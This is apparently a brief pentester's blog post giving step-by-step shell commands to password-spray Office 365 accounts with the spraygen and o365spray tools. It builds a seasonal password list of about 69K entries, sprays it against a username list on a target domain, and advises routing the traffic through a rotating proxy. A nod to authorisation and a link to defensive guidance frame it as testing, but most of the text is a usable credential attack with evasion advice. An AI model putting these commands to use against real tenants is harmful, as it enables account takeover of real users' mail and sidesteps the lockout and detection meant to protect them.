Clearly this is for penetration testing, not for evil! So if you have to pentest Office 365 you might want to be attacking the authentication services. This will be aligned to the tenant you are testing, as always make sure you have authorisation.
Deploy to your favourite LINUX instance or WSL etc.
#Office 365 Auth Attacks
#Prepare to Spray
cd ~/
mkdir /wordlists
#SprayGen seems to be USA centric so customise for the country you are operating in/on
git clone https://github.com/3ndG4me/spraygen.git
cd spraygen/
pip3 install -r requirements.txt
# You can customise this with cewl etc.
# you can specify a custom wordlist etc.
python3 spraygen.py -p --year_start 2017 --year_end 2023 -o /wordlists/spraylist.txt
#Now make a cup of tea or 2 this will take some time
cd ..
# Ciber Lasers - Spray Office 365
git clone https://github.com/0xZDH/o365spray.git
cd /o365spray
# python3 spraygen.py -p --year_start 2017 --year_end 2023 -o spraylist.txt --type seasons
# seasons alone will generate this list ~69K
# cat spraylist.txt | wc -l
# Customise this, you really need to run this through a rotating proxy etc.
python o365spray.py --spray -U usernames.txt -P /wordlists/spraylist.txt --count 10 --lockout 10 --domain target.local
This should just about get you started! Remember, hax for g00d!
Also as with most things, make sure you customise and configure them:
For more Office 365 Testing/Auditing tools check here:
Check out some defensive guidance here:
Defending Against Direct Authentication Attacks in Microsoft Office 365 – PwnDefend